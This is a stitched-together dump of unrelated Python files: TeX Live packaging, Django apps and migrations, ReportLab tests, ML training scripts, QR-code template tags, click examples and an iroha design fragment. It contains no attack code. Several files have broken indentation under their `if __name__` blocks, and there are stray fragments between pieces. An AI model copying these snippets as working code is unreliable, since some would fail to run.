                                        "collection-pictures", "collection-plaingeneric"],
        "collection-mathscience": ["collection-langgreek"],
        "collection-langkorean": ["collection-langjapanese", "collection-langcjk",
                                  "collection-latexrecommended"],
        "collection-latexextra": ["collection-fontsextra"],
        "collection-humanities": ["collection-latexextra"],
        "collection-pictures": ["collection-latexextra"],
        "collection-fontsextra": ["collection-plaingeneric", "noto", "alegreya", "montserrat",
                                  "fira", "lato", "mpfonts", "libertine", "drm", "poltawski",
                                  "cm-unicode", "roboto", "dejavu", "plex", "stickstoo",
                                  "ebgaramond", "ipaex-type1", "paratype", "antt",
                                  "cormorantgaramond", "libertinus-type1"],
        "collection-pstricks": ["collection-plaingeneric"],
    }
    if package == "collection-basic":
        return []
    if package == "collection-latex":
        return ["collection-basic"]
    if package in extra_conflicts:
        return base + extra_conflicts[package]
    if package in base_only_collections or not package.startswith("collection-"):
        return list(base)
    # Bug fix: the original raised with sys.argv[1], which is wrong when this
    # function is called as a library (and `sys` is not imported at module
    # scope); report the actual argument instead.
    raise ValueError(package + " isn't a known package name")
# Command-line interface:
#   argv[1] = package/collection name, argv[2] = path to texlive.tlpdb
#   trailing "print_names" argument switches to dependency-name output.
if __name__ == '__main__':
    import sys
    tlpdb = sys.argv[2]
    # Module-level dict consumed by get_files_in_package / Files.
    pkg_dict = parse_tlpdb_to_dict(tlpdb)
    if len(sys.argv) > 2 and sys.argv[-1] == "print_names":
        """Generate dependencies to put into TERMUX_SUBPKG_DEPENDS"""
        # Strip latex and basic since those are part of termux package "texlive"
        pkgs_in_texlive = ["latex", "basic"]
        dependencies = ["texlive-"+pkg for pkg in get_conflicting_pkgs(sys.argv[1]) if not pkg in pkgs_in_texlive]
        if len(dependencies) > 0:
            print("texlive, "+", ".join(dependencies))
        else:
            print("texlive")
    else:
        """Print files which should be included in the subpackage"""
        # The last set of packages are needed to make our texlive package able to
        # generate pdflatex.fmt and compile a simple LaTeX test file, so they
        # should be part of texlive.
        print("\n".join(["share/texlive/"+line for line in
                         list( set(Files([sys.argv[1]])) -
                               set(Files(get_conflicting_pkgs(sys.argv[1]))) -
                               set(Files(["dehyph-exptl",
                                          "hyphen-afrikaans",
                                          "kpathsea",
                                          "amsfonts",
                                          "texlive-scripts-extra",
                                          "l3backend",
                                          "latexconfig",
                                          "tex-ini-files"])) )]))
|
from django.apps import AppConfig
from django.contrib.auth import get_user_model
class UsermanagerdemoConfig(AppConfig):
    """AppConfig that plugs the usermanager demo into the superuser UI."""
    name = 'cradmin_legacy.demo.usermanagerdemo'
    verbose_name = "Usermanager demo"

    def ready(self):
        # Imported here so the registry is only touched once apps are loaded.
        from cradmin_legacy.superuserui import superuserui_registry
        django_app = superuserui_registry.DjangoAppConfig(app_label='usermanagerdemo')
        registered_app = superuserui_registry.default.add_djangoapp(django_app)
        registered_app.add_model(
            superuserui_registry.ModelConfig(model_class=get_user_model()))
|
# Generated by Django 2.0.2 on 2018-03-06 16:44
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
    """Restructure dynamic forms.

    Adds DynamicOptionSelects, FormAttribute and SimpleOptionSelects,
    replaces ValueAttribute with the FormAttribute through-model, and
    extends DynamicForm with ``code``, ``css_class`` and ``is_wizard``.
    """
    dependencies = [
        ('contenttypes', '0002_remove_content_type_name'),
        ('django_dynamic_forms', '0001_initial'),
    ]
    operations = [
        # New model: generic-FK based option source (content_type + object_id).
        migrations.CreateModel(
            name='DynamicOptionSelects',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
                ('object_id', models.PositiveIntegerField()),
                ('content_type', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='contenttypes.ContentType')),
            ],
            options={
                'verbose_name_plural': 'dynamic option select',
            },
        ),
        # New model: through-table between DynamicForm and DynamicAttribute
        # (its FKs are added at the end, after ValueAttribute is removed).
        migrations.CreateModel(
            name='FormAttribute',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
                ('css_class', models.CharField(blank=True, max_length=256, null=True, verbose_name='css class')),
                ('is_required', models.BooleanField(default=False, verbose_name='is required?')),
            ],
            options={
                'abstract': False,
            },
        ),
        # New model: simple code/name option source.
        migrations.CreateModel(
            name='SimpleOptionSelects',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
                ('code', models.CharField(max_length=100, verbose_name='code')),
                ('name', models.CharField(max_length=256, verbose_name='name')),
            ],
            options={
                'verbose_name_plural': 'simple option select',
            },
        ),
        # Strip ValueAttribute's FKs before deleting the model below.
        migrations.RemoveField(
            model_name='valueattribute',
            name='dynamic_attribute',
        ),
        migrations.RemoveField(
            model_name='valueattribute',
            name='dynamic_form',
        ),
        # `default=None` + preserve_default=False: the default only fills
        # existing rows during this migration and is not kept on the field.
        migrations.AddField(
            model_name='dynamicform',
            name='code',
            field=models.CharField(default=None, max_length=256, verbose_name='code'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='dynamicform',
            name='css_class',
            field=models.CharField(blank=True, max_length=256, null=True, verbose_name='css class'),
        ),
        migrations.AddField(
            model_name='dynamicform',
            name='is_wizard',
            field=models.BooleanField(default=False, verbose_name='is wizard?'),
        ),
        migrations.AlterField(
            model_name='dynamicattribute',
            name='field_type',
            field=models.CharField(choices=[('TXT', 'Text'), ('TXB', 'Textarea'), ('CHK', 'Checkbox'), ('RDO', 'Radio'), ('SLT', 'Select')], max_length=100, verbose_name='field types'),
        ),
        # The M2M now routes through the new FormAttribute model.
        migrations.AlterField(
            model_name='dynamicform',
            name='attribute',
            field=models.ManyToManyField(through='django_dynamic_forms.FormAttribute', to='django_dynamic_forms.DynamicAttribute', verbose_name='attribute'),
        ),
        migrations.DeleteModel(
            name='ValueAttribute',
        ),
        migrations.AddField(
            model_name='formattribute',
            name='dynamic_attribute',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='django_dynamic_forms.DynamicAttribute', verbose_name='attribute'),
        ),
        migrations.AddField(
            model_name='formattribute',
            name='dynamic_form',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='django_dynamic_forms.DynamicForm', verbose_name='form'),
        ),
        migrations.AddField(
            model_name='dynamicoptionselects',
            name='parent',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='django_dynamic_forms.DynamicAttribute', verbose_name='parent'),
        ),
    ]
|
# modules
import matplotlib.pyplot as plt
from sklearn.datasets import make_moons
from neural_network import NeuralNetwork
# prepare dataset: the scikit-learn "two moons" toy classification problem
X, y = make_moons(n_samples=200, noise=0.2, random_state=42)
# instantiate a NeuralNetwork object and train the network
# (train() presumably returns the learned weight matrices — confirm in
# neural_network.py)
nn = NeuralNetwork(X, y, learning_rate = 0.001, epochs = 5000)
hidden_weights, outer_weights = nn.train()
# plot the loss over epochs and the accuracy recorded during training
fig, (ax1, ax2) = plt.subplots(nrows=2, ncols=1, sharex=True, figsize=(15, 8))
ax1.plot(nn.loss_values)
ax1.set_ylabel('Loss Value')
ax1.set_title('LOSS OVER TRAINING EPOCHS')
ax2.plot(nn.acc)
ax2.set_xlabel('Number of Epochs')
ax2.set_ylabel('Accuracy')
ax2.set_title('ACCURACY OVER TRAINING EPOCHS')
plt.show()
""""
scrapyd api 的异步实现
"""
|
from allauth.utils import get_user_model
def create_user():
    """Create and return a test user with fixed credentials.

    Goes through the configured user model's manager so a custom
    ``AUTH_USER_MODEL`` is honoured.
    """
    return get_user_model().objects.create_user(
        username='testuser',
        password='testpass',
    )
|
#Copyright ReportLab Europe Ltd. 2000-2004
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/test/test_paragraphs.py
# tests some paragraph styles
import unittest
from tests.utils import makeSuiteForClasses, outputfile, printLocation
from reportlab.platypus import Paragraph, SimpleDocTemplate, XBox, Indenter, XPreformatted
from reportlab.lib.styles import ParagraphStyle
from reportlab.lib.units import inch
from reportlab.lib.colors import red, black, navy, white, green
from reportlab.lib.randomtext import randomText
from reportlab.rl_config import defaultPageSize
from wordaxe.rl.styles import getSampleStyleSheet, ParagraphStyle
from wordaxe.rl.NewParagraph import Paragraph
# Page geometry used by the page-decoration callbacks below.
(PAGE_WIDTH, PAGE_HEIGHT) = defaultPageSize
def myFirstPage(canvas, doc):
    """Decorate page 1: red left margin rule, title banner and footer."""
    canvas.saveState()
    canvas.setStrokeColor(red)
    canvas.setLineWidth(5)
    # Vertical rule 66pt from the left edge, inset 72pt top and bottom.
    canvas.line(66,72,66,PAGE_HEIGHT-72)
    canvas.setFont('Times-Bold',24)
    canvas.drawString(108, PAGE_HEIGHT-54, "TESTING PARAGRAPH STYLES")
    canvas.setFont('Times-Roman',12)
    canvas.drawString(4 * inch, 0.75 * inch, "First Page")
    canvas.restoreState()
def myLaterPages(canvas, doc):
    """Decorate pages 2+: red left margin rule and a page-number footer."""
    canvas.saveState()
    canvas.setStrokeColor(red)
    canvas.setLineWidth(5)
    canvas.line(66,72,66,PAGE_HEIGHT-72)
    canvas.setFont('Times-Roman',12)
    canvas.drawString(4 * inch, 0.75 * inch, "Page %d" % doc.page)
    canvas.restoreState()
class ParagraphTestCase(unittest.TestCase):
    "Test Paragraph class (eyeball-test)."
    def test0(self):
        """Build a PDF exercising many paragraph features for visual review.

        The story covers: style-driven and inline spacing, background
        colours, leading-whitespace handling, inline markup (font, bold,
        italic, underline, super/subscript), case-insensitive tag parsing,
        and bulleted/indented lists driven by Indenter and seq tags.
        Features to be visually confirmed by a human being in the
        generated test_paragraphs.pdf.
        """
        story = []
        #need a style
        styNormal = ParagraphStyle('normal')
        styGreen = ParagraphStyle('green',parent=styNormal,textColor=green)
        # some to test
        stySpaced = ParagraphStyle('spaced',
                                   parent=styNormal,
                                   spaceBefore=12,
                                   spaceAfter=12)
        # --- spacing: from the style vs. inline <para> attributes ---
        story.append(
            Paragraph("This is a normal paragraph. "
                      + randomText(), styNormal))
        story.append(
            Paragraph("This has 12 points space before and after, set in the style. "
                      + randomText(), stySpaced))
        story.append(
            Paragraph("This is normal. " +
                      randomText(), styNormal))
        story.append(
            Paragraph('''<para spacebefore="12" spaceafter="12">
            This has 12 points space before and after, set inline with
            XML tag. It works too.''' + randomText() + "</para>",
            styNormal))
        story.append(
            Paragraph("This is normal. " +
                      randomText(), styNormal))
        # --- background colours: style-driven and via <para backcolor> ---
        styBackground = ParagraphStyle('MyTitle',
                                       fontName='Helvetica-Bold',
                                       fontSize=24,
                                       leading=28,
                                       textColor=white,
                                       backColor=navy)
        story.append(
            Paragraph("This is a title with a background. ", styBackground))
        story.append(
            Paragraph('''<para backcolor="pink">This got a background from the para tag</para>''', styNormal))
        # --- leading whitespace handling with and without a <para> tag ---
        story.append(
            Paragraph('''<para>\n\tThis has newlines and tabs on the front but inside the para tag</para>''', styNormal))
        story.append(
            Paragraph('''<para> This has spaces on the front but inside the para tag</para>''', styNormal))
        story.append(
            Paragraph('''\n\tThis has newlines and tabs on the front but no para tag''', styNormal))
        story.append(
            Paragraph(''' This has spaces on the front but no para tag''', styNormal))
        # --- inline markup: colour, bold/italic/underline, scripts, fonts ---
        story.append(Paragraph('''This has <font color=blue>blue text</font> here.''', styNormal))
        story.append(Paragraph('''This has <i>italic text</i> here.''', styNormal))
        story.append(Paragraph('''This has <b>bold text</b> here.''', styNormal))
        story.append(Paragraph('''This has <u>underlined text</u> here.''', styNormal))
        story.append(Paragraph('''This has <font color=blue><u>blue and <font color=red>red</font> underlined text</u></font> here.''', styNormal))
        story.append(Paragraph('''<u>green underlining</u>''', styGreen))
        story.append(Paragraph('''<u>green <font size=+4><i>underlining</font></i></u>''', styGreen))
        story.append(Paragraph('''This has m<super>2</super> a superscript.''', styNormal))
        story.append(Paragraph('''This has m<sub>2</sub> a subscript. Like H<sub>2</sub>O!''', styNormal))
        story.append(Paragraph('''This has a font change to <font name=Helvetica>Helvetica</font>.''', styNormal))
        #This one fails:
        #story.append(Paragraph('''This has a font change to <font name=Helvetica-Oblique>Helvetica-Oblique</font>.''', styNormal))
        story.append(Paragraph('''This has a font change to <font name=Helvetica><i>Helvetica in italics</i></font>.''', styNormal))
        # --- caseSensitive=0: upper-case tags must be honoured ---
        story.append(Paragraph('''This one uses upper case tags and has set caseSensitive=0: Here comes <FONT FACE="Helvetica" SIZE="14pt">Helvetica 14</FONT> with <STRONG>strong</STRONG> <EM>emphasis</EM>.''', styNormal, caseSensitive=0))
        story.append(Paragraph('''The same as before, but has set not set caseSensitive, thus the tags are ignored: Here comes <FONT FACE="Helvetica" SIZE="14pt">Helvetica 14</FONT> with <STRONG>strong</STRONG> <EM>emphasis</EM>.''', styNormal))
        story.append(Paragraph('''This one uses fonts with size "14pt" and also uses the em and strong tags: Here comes <font face="Helvetica" size="14pt">Helvetica 14</font> with <Strong>strong</Strong> <em>emphasis</em>.''', styNormal, caseSensitive=0))
        story.append(Paragraph('''This uses a font size of 3cm: Here comes <font face="Courier" size="3cm">Courier 3cm</font> and normal again.''', styNormal, caseSensitive=0))
        story.append(Paragraph('''This is just a very long silly text to see if the <FONT face="Courier">caseSensitive</FONT> flag also works if the paragraph is <EM>very</EM> long. '''*20, styNormal, caseSensitive=0))
        # --- indented, bulleted, sequence-numbered lists ---
        story.append(Indenter("1cm"))
        story.append(Paragraph("<para><bullet bulletIndent='-1cm' bulletOffsetY='2'><seq id='s0'/>)</bullet>Indented list bulletOffsetY=2. %s</para>" % randomText(), styNormal))
        story.append(Paragraph("<para><bullet bulletIndent='-1cm'><seq id='s0'/>)</bullet>Indented list. %s</para>" % randomText(), styNormal))
        story.append(Paragraph("<para><bullet bulletIndent='-1cm'><seq id='s0'/>)</bullet>Indented list. %s</para>" % randomText(), styNormal))
        story.append(Indenter("1cm"))
        story.append(XPreformatted("<para leftIndent='0.5cm' backcolor=pink><bullet bulletIndent='-1cm'><seq id='s1'/>)</bullet>Indented list.</para>", styNormal))
        story.append(XPreformatted("<para leftIndent='0.5cm' backcolor=palegreen><bullet bulletIndent='-1cm'><seq id='s1'/>)</bullet>Indented list.</para>", styNormal))
        story.append(Indenter("-1cm"))
        story.append(Paragraph("<para><bullet bulletIndent='-1cm'><seq id='s0'/>)</bullet>Indented list. %s</para>" % randomText(), styNormal))
        story.append(Indenter("-1cm"))
        story.append(Paragraph("<para>Indented list using seqChain/Format<seqChain order='s0 s1 s2 s3 s4'/><seqReset id='s0'/><seqFormat id='s0' value='1'/><seqFormat id='s1' value='a'/><seqFormat id='s2' value='i'/><seqFormat id='s3' value='A'/><seqFormat id='s4' value='I'/></para>", stySpaced))
        story.append(Indenter("1cm"))
        story.append(Paragraph("<para><bullet bulletIndent='-1cm'><seq id='s0'/>)</bullet>Indented list. %s</para>" % randomText(), styNormal))
        story.append(Paragraph("<para><bullet bulletIndent='-1cm'><seq id='s0'/>)</bullet>Indented list. %s</para>" % randomText(), styNormal))
        story.append(Paragraph("<para><bullet bulletIndent='-1cm'><seq id='s0'/>)</bullet>Indented list. %s</para>" % randomText(), styNormal))
        story.append(Indenter("1cm"))
        story.append(XPreformatted("<para backcolor=pink boffsety='-3'><bullet bulletIndent='-1cm'><seq id='s1'/>)</bullet>Indented list bulletOffsetY=-3.</para>", styNormal))
        story.append(XPreformatted("<para backcolor=pink><bullet bulletIndent='-1cm'><seq id='s1'/>)</bullet>Indented list.</para>", styNormal))
        story.append(Indenter("-1cm"))
        story.append(Paragraph("<para><bullet bulletIndent='-1cm'><seq id='s0'/>)</bullet>Indented list. %s</para>" % randomText(), styNormal))
        story.append(Indenter("1cm"))
        story.append(XPreformatted("<para backcolor=palegreen><bullet bulletIndent='-1cm'><seq id='s1'/>)</bullet>Indented list.</para>", styNormal))
        story.append(Indenter("1cm"))
        story.append(XPreformatted("<para><bullet bulletIndent='-1cm'><seq id='s2'/>)</bullet>Indented list. line1</para>", styNormal))
        story.append(XPreformatted("<para><bullet bulletIndent='-1cm'><seq id='s2'/>)</bullet>Indented list. line2</para>", styNormal))
        story.append(Indenter("-1cm"))
        story.append(XPreformatted("<para backcolor=palegreen><bullet bulletIndent='-1cm'><seq id='s1'/>)</bullet>Indented list.</para>", styNormal))
        story.append(Indenter("-1cm"))
        story.append(Indenter("-1cm"))
        """
        story.append(Paragraph('''This is just a very long silly text to see if the <FONT face="Courier">caseSensitive</FONT> flag also works if the paragraph is <EM>very</EM> long. '''*3, styNormal, caseSensitive=0))
        """
        # Render everything; showBoundary=1 draws frame borders for review.
        template = SimpleDocTemplate(outputfile('test_paragraphs.pdf'),
                                     showBoundary=1)
        template.build(story,
            onFirstPage=myFirstPage, onLaterPages=myLaterPages)
def makeSuite():
    """Return the unittest suite containing ParagraphTestCase."""
    return makeSuiteForClasses(ParagraphTestCase)
#noruntests
if __name__ == "__main__":
unittest.TextTestRunner().run(makeSuite())
printLocation() |
import os,time,sys
sys.path.append('../')
import numpy as np
from datasets.load import loadDataset
from parse_args_dkf import parse; params = parse()
from utils.misc import removeIfExists,createIfAbsent,mapPrint,saveHDF5,displayTime
# Python 2 script: loads a dataset, builds a DKF (Deep Kalman Filter)
# model (fresh or reloaded from a checkpoint), trains it and saves results.
if params['dataset']=='':
    params['dataset']='synthetic9'
dataset = loadDataset(params['dataset'])
# Optionally truncate the training set to the first `ntrain` sequences.
dataset['train'] = dataset['train'][:params['ntrain']]
params['savedir']+='-'+params['dataset']
createIfAbsent(params['savedir'])
#Saving/loading: copy dataset dimensions into the model parameters
for k in ['dim_observations','dim_actions','data_type', 'dim_stochastic']:
    params[k] = dataset[k]
mapPrint('Options: ',params)
#Setup VAE Model (or reload from existing savefile)
start_time = time.time()
from stinfmodel_fast.dkf import DKF
import stinfmodel_fast.evaluate as DKF_evaluate
import stinfmodel_fast.learning as DKF_learn
displayTime('import DKF',start_time, time.time())
dkf = None
#Remove from params
start_time = time.time()
removeIfExists('./NOSUCHFILE')
reloadFile = params.pop('reloadFile')
if os.path.exists(reloadFile):
    # Resume: both the parameter pickle and the weight file must exist.
    pfile=params.pop('paramFile')
    assert os.path.exists(pfile),pfile+' not found. Need paramfile'
    print 'Reloading trained model from : ',reloadFile
    print 'Assuming ',pfile,' corresponds to model'
    dkf = DKF(params, paramFile = pfile, reloadFile = reloadFile)
else:
    # Fresh run: write the configuration pickle next to the checkpoints.
    pfile= params['savedir']+'/'+params['unique_id']+'-config.pkl'
    print 'Training model from scratch. Parameters in: ',pfile
    dkf = DKF(params, paramFile = pfile)
displayTime('Building dkf',start_time, time.time())
savef = os.path.join(params['savedir'],params['unique_id'])
print 'Savefile: ',savef
start_time= time.time()
# Train with periodic checkpointing and validation on the held-out split.
savedata = DKF_learn.learn(dkf, dataset['train'], dataset['mask_train'],
                epoch_start =0 ,
                epoch_end = params['epochs'],
                batch_size = params['batch_size'],
                savefreq = params['savefreq'],
                savefile = savef,
                dataset_eval=dataset['valid'],
                mask_eval = dataset['mask_valid'],
                replicate_K = 5
                )
displayTime('Running DKF',start_time, time.time())
#Save file log file
saveHDF5(savef+'-final.h5',savedata)
#import ipdb;ipdb.set_trace()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from time import localtime, strftime
import argparse
from argparse import RawTextHelpFormatter
from gdcmdtools.find import GDFind
from gdcmdtools.base import BASE_INFO
from gdcmdtools.base import DEBUG_LEVEL
from gdcmdtools.perm import help_permission_text
import json
import csv
import pprint
# Tool identity used in the argparse description and the logger name.
__THIS_APP = 'gdfind'
__THIS_DESCRIPTION = 'Tool to walk through folder on Google Drive'
__THIS_VERSION = BASE_INFO["version"]
import logging
logger = logging.getLogger(__THIS_APP)
def test():
    """Placeholder smoke test; always passes."""
    assert True
if __name__ == '__main__':
    # Build the CLI: one required folder id plus optional copy/debug flags.
    arg_parser = argparse.ArgumentParser(
        description='%s v%s - %s - %s (%s)' %
        (__THIS_APP,
         __THIS_VERSION,
         __THIS_DESCRIPTION,
         BASE_INFO["app"],
         BASE_INFO["description"]),
        formatter_class=RawTextHelpFormatter)
    arg_parser.add_argument('folder_id',
                            help='Specify the folder id to walk through')
    arg_parser.add_argument(
        '-t',
        '--new_title',
        help='the title for the new file')
    arg_parser.add_argument('--debug',
                            choices=DEBUG_LEVEL,
                            default=DEBUG_LEVEL[-1],
                            help='define the debug level')
    arg_parser.add_argument(
        '-c', '--copy_mode',
        action='store_true',
        help='set if you like to copy the folder')
    arg_parser.add_argument('-f', '--parent_id',
                            help='copy the file to folder specified by Id for --copy_mode')
    args = arg_parser.parse_args()
    # Map the --debug choice onto the logging module's level constants.
    logger.setLevel(getattr(logging, args.debug.upper()))
    logger.debug(args)
    find = GDFind(args)
    try:
        response = find.run()
    except:
        # Propagate any failure unchanged (kept for an explicit hook point).
        raise
    try:
        from asciitree import LeftAligned
    except:
        # asciitree is optional; fall back to plain JSON output.
        print(json.dumps(response, indent=4))
    else:
        tree = LeftAligned()
        # Fixed: was the Python 2-only statement `print tree(response)`,
        # inconsistent with the function-call print() used above.
        print(tree(response))
    sys.exit(0)
|
"""Tags for Django template system that help generating QR codes."""
from django import template
from qr_code.qrcode.maker import make_qr_code
from qr_code.qrcode.utils import make_email_text, make_google_play_text, make_tel_text, make_sms_text, \
make_youtube_text, WifiConfig, ContactDetail, Coordinates
# Template tag registry for this library (loaded via {% load ... %}).
register = template.Library()
def _make_contact_or_wifi_qr_code(contact_or_wifi, expected_cls, embedded, qr_code_args):
    """Render a QR code for a ContactDetail or WifiConfig (or a dict of its kwargs)."""
    if not isinstance(contact_or_wifi, expected_cls):
        # For compatibility with existing views and templates, try to build from dict.
        contact_or_wifi = expected_cls(**contact_or_wifi)
    return make_qr_code(contact_or_wifi.make_qr_code_text(), qr_code_args=qr_code_args, embedded=embedded)
def _make_google_maps_qr_code(embedded, **kwargs):
    """Render a QR code pointing at Google Maps for the given coordinates.

    Accepts either a 'coordinates' kwarg or the pair 'latitude'/'longitude';
    remaining kwargs are forwarded as QR rendering options.
    """
    if 'coordinates' in kwargs:
        coordinates = kwargs.pop('coordinates')
    else:
        coordinates = Coordinates(kwargs.pop('latitude'), kwargs.pop('longitude'))
    return make_qr_code(coordinates.make_google_maps_text(), qr_code_args=kwargs, embedded=embedded)
def _make_geolocation_qr_code(embedded, **kwargs):
    """Render a geolocation QR code.

    Accepts either a 'coordinates' kwarg or the triplet
    'latitude'/'longitude'/'altitude' (all three are required in that form —
    a missing one raises KeyError); remaining kwargs are QR rendering options.
    """
    if 'coordinates' in kwargs:
        coordinates = kwargs.pop('coordinates')
    else:
        coordinates = Coordinates(kwargs.pop('latitude'), kwargs.pop('longitude'), kwargs.pop('altitude'))
    return make_qr_code(coordinates.make_geolocation_text(), qr_code_args=kwargs, embedded=embedded)
# --- Tags rendering an embedded QR code (image inlined in the page). ---
@register.simple_tag()
def qr_from_text(text, **kwargs):
    """Render an embedded QR code encoding *text*."""
    return make_qr_code(text, qr_code_args=kwargs, embedded=True)
@register.simple_tag()
def qr_for_email(email, **kwargs):
    """Render an embedded QR code for sending an email to *email*."""
    return make_qr_code(make_email_text(email), qr_code_args=kwargs, embedded=True)
@register.simple_tag()
def qr_for_tel(phone_number, **kwargs):
    """Render an embedded QR code for calling *phone_number*."""
    return make_qr_code(make_tel_text(phone_number), qr_code_args=kwargs, embedded=True)
@register.simple_tag()
def qr_for_sms(phone_number, **kwargs):
    """Render an embedded QR code for texting *phone_number*."""
    return make_qr_code(make_sms_text(phone_number), qr_code_args=kwargs, embedded=True)
@register.simple_tag()
def qr_for_geolocation(**kwargs):
    """Accepts a *'coordinates'* keyword argument or a triplet *'latitude'*, *'longitude'*, and *'altitude'*."""
    return _make_geolocation_qr_code(embedded=True, **kwargs)
@register.simple_tag()
def qr_for_google_maps(**kwargs):
    """Accepts a *'coordinates'* keyword argument or a pair *'latitude'* and *'longitude'*."""
    return _make_google_maps_qr_code(embedded=True, **kwargs)
@register.simple_tag()
def qr_for_youtube(video_id, **kwargs):
    """Render an embedded QR code linking to the YouTube video *video_id*."""
    return make_qr_code(make_youtube_text(video_id), qr_code_args=kwargs, embedded=True)
@register.simple_tag()
def qr_for_google_play(package_id, **kwargs):
    """Render an embedded QR code linking to the Google Play app *package_id*."""
    return make_qr_code(make_google_play_text(package_id), qr_code_args=kwargs, embedded=True)
@register.simple_tag()
def qr_for_contact(contact_detail, **kwargs):
    """Render an embedded QR code for a ContactDetail (or dict of its kwargs)."""
    return _make_contact_or_wifi_qr_code(contact_detail, ContactDetail, qr_code_args=kwargs, embedded=True)
@register.simple_tag()
def qr_for_wifi(wifi_config, **kwargs):
    """Render an embedded QR code for a WifiConfig (or dict of its kwargs)."""
    return _make_contact_or_wifi_qr_code(wifi_config, WifiConfig, qr_code_args=kwargs, embedded=True)
# --- Tags rendering a URL to a QR code (served separately, not inlined). ---
@register.simple_tag()
def qr_url_from_text(text, **kwargs):
    """Return a URL to a QR code encoding *text*."""
    return make_qr_code(text, qr_code_args=kwargs, embedded=False)
@register.simple_tag()
def qr_url_for_email(email, **kwargs):
    """Return a URL to a QR code for sending an email to *email*."""
    return make_qr_code(make_email_text(email), qr_code_args=kwargs, embedded=False)
@register.simple_tag()
def qr_url_for_tel(phone_number, **kwargs):
    """Return a URL to a QR code for calling *phone_number*."""
    return make_qr_code(make_tel_text(phone_number), qr_code_args=kwargs, embedded=False)
@register.simple_tag()
def qr_url_for_sms(phone_number, **kwargs):
    """Return a URL to a QR code for texting *phone_number*."""
    return make_qr_code(make_sms_text(phone_number), qr_code_args=kwargs, embedded=False)
@register.simple_tag()
def qr_url_for_geolocation(**kwargs):
    """Accepts a *'coordinates'* keyword argument or a triplet *'latitude'*, *'longitude'*, and *'altitude'*."""
    return _make_geolocation_qr_code(embedded=False, **kwargs)
@register.simple_tag()
def qr_url_for_google_maps(**kwargs):
    """Accepts a *'coordinates'* keyword argument or a pair *'latitude'* and *'longitude'*."""
    return _make_google_maps_qr_code(embedded=False, **kwargs)
@register.simple_tag()
def qr_url_for_youtube(video_id, **kwargs):
    """Return a URL to a QR code linking to the YouTube video *video_id*."""
    return make_qr_code(make_youtube_text(video_id), qr_code_args=kwargs, embedded=False)
@register.simple_tag()
def qr_url_for_google_play(package_id, **kwargs):
    """Return a URL to a QR code linking to the Google Play app *package_id*."""
    return make_qr_code(make_google_play_text(package_id), qr_code_args=kwargs, embedded=False)
@register.simple_tag()
def qr_url_for_contact(contact_detail, **kwargs):
    """Return a URL to a QR code for a ContactDetail (or dict of its kwargs)."""
    return _make_contact_or_wifi_qr_code(contact_detail, ContactDetail, qr_code_args=kwargs, embedded=False)
@register.simple_tag()
def qr_url_for_wifi(wifi_config, **kwargs):
    """Return a URL to a QR code for a WifiConfig (or dict of its kwargs)."""
    return _make_contact_or_wifi_qr_code(wifi_config, WifiConfig, qr_code_args=kwargs, embedded=False)
|
# Read n integers and print the sum of squared deviations from the
# mean rounded to the nearest integer.
n = int(input())
x = list(map(int, input().split()))
avg = round(sum(x) / n)
print(sum((xi - avg) ** 2 for xi in x))
|
import sys
import click
from click_rich_help import StyledCommand
# NOTE: the docstring below is user-visible --help text (click uses it);
# rich markup like [b yellow] is rendered by click_rich_help.
@click.command(cls=StyledCommand, styles={"header": "bold red underline reverse"})
@click.option("--count", default=1, help="[red]Number[/red] of greetings.")
@click.option("--name", prompt="Your name", help="The person to greet.")
def hello(count, name):
    """Simple program that greets [b yellow]NAME[/b yellow] for a total of [b yellow]COUNT[/b yellow] times."""
    for _ in range(count):
        click.echo(f"Hello {name}!")
# Same command, but with use_theme="default" so the custom header style is
# layered on top of the package's default theme.
@click.command(
    cls=StyledCommand,
    styles={"header": "bold red underline reverse"},
    use_theme="default",
)
@click.option("--count", default=1, help="[red]Number[/red] of greetings.")
@click.option("--name", prompt="Your name", help="The person to greet.")
def hello_inherit(count, name):
    """Simple program that greets [b yellow]NAME[/b yellow] for a total of [b yellow]COUNT[/b yellow] times."""
    for _ in range(count):
        click.echo(f"Hello {name}!")
if __name__ == "__main__":
if sys.argv[1] == "inherit":
hello_inherit()
else:
hello()
|
import sys
sys.path.append('../py')
from iroha import *
from iroha.iroha import *
# Build an iroha design with one task table and three callers:
# the parent module, a sibling table in the same module, and a sibling module.
d = IDesign()
mod_top = IModule(d, "M_top")
tab_top = ITable(mod_top)
mod_sub = IModule(d, "M_sub")
mod_sub.parent_module = mod_top
tab_sub = ITable(mod_sub)
mod_sibling = IModule(d, "M_sibling")
mod_sibling.parent_module = mod_top
tab_sibling = ITable(mod_sibling)
# task tab: two states — entry (receives the argument), then print it
task_tab = ITable(mod_sub)
task = design_tool.CreateTask(task_tab)
task.output_types.append(IValueType(False, 32))
task_st1 = IState(task_tab)
task_st2 = IState(task_tab)
task_tab.states.append(task_st1)
task_tab.states.append(task_st2)
task_tab.initialSt = task_st1
design_tool.AddNextState(task_st1, task_st2)
task_entry = IInsn(task)
task_st1.insns.append(task_entry)
callee_arg = IRegister(task_tab, "arg")
task_entry.outputs.append(callee_arg)
print_res = design_tool.GetResource(task_tab, "print")
print_insn = IInsn(print_res)
print_insn.inputs.append(callee_arg)
